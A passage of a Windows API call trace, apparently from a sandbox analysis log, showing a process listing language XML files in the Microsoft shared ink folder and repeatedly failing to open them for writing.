Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.333] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.333] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0099.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0099.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0099.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.334] AreFileApisANSI () returned 1 [0099.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpUsedDefaultChar=0x0) returned 83 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0099.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.334] AreFileApisANSI () returned 1 [0099.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0099.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x60138, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 83 [0099.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.335] GetFileType (hFile=0x27c) returned 0x1 [0099.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0099.335] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.335] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.335] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.335] CloseHandle (hObject=0x27c) returned 1 [0099.335] AreFileApisANSI () returned 1 [0099.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 83 [0099.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.336] GetLastError () returned 0x5 [0099.336] GetLastError () returned 0x5 [0099.336] SetLastError (dwErrCode=0x5) [0099.336] GetLastError () returned 0x5 [0099.336] SetLastError (dwErrCode=0x5) [0099.336] GetLastError () returned 0x5 [0099.336] SetLastError (dwErrCode=0x5) [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0099.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.336] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0099.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81a88 [0099.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0099.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.337] AreFileApisANSI () returned 1 [0099.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpUsedDefaultChar=0x0) returned 83 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0099.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0099.337] AreFileApisANSI () returned 1 [0099.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0099.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x604a8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 83 [0099.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.338] GetFileType (hFile=0x27c) returned 0x1 [0099.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0099.338] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.338] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.338] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.338] CloseHandle (hObject=0x27c) returned 1 [0099.338] AreFileApisANSI () returned 1 [0099.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 83 [0099.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.339] GetLastError () returned 0x5 [0099.339] GetLastError () returned 0x5 [0099.339] SetLastError (dwErrCode=0x5) [0099.339] GetLastError () returned 0x5 [0099.339] SetLastError (dwErrCode=0x5) [0099.339] GetLastError () returned 0x5 [0099.339] SetLastError (dwErrCode=0x5) [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.339] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.339] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.339] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0099.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0099.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0099.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.340] AreFileApisANSI () returned 1 [0099.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpUsedDefaultChar=0x0) returned 83 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0099.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.340] AreFileApisANSI () returned 1 [0099.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 83 [0099.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.341] GetFileType (hFile=0x27c) returned 0x1 [0099.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.341] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.341] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.341] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.341] CloseHandle (hObject=0x27c) returned 1 [0099.341] AreFileApisANSI () returned 1 [0099.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 83 [0099.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.342] GetLastError () returned 0x5 [0099.342] GetLastError () returned 0x5 [0099.342] SetLastError (dwErrCode=0x5) [0099.342] GetLastError () returned 0x5 [0099.342] SetLastError (dwErrCode=0x5) [0099.342] GetLastError () returned 0x5 [0099.342] SetLastError (dwErrCode=0x5) [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0099.342] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 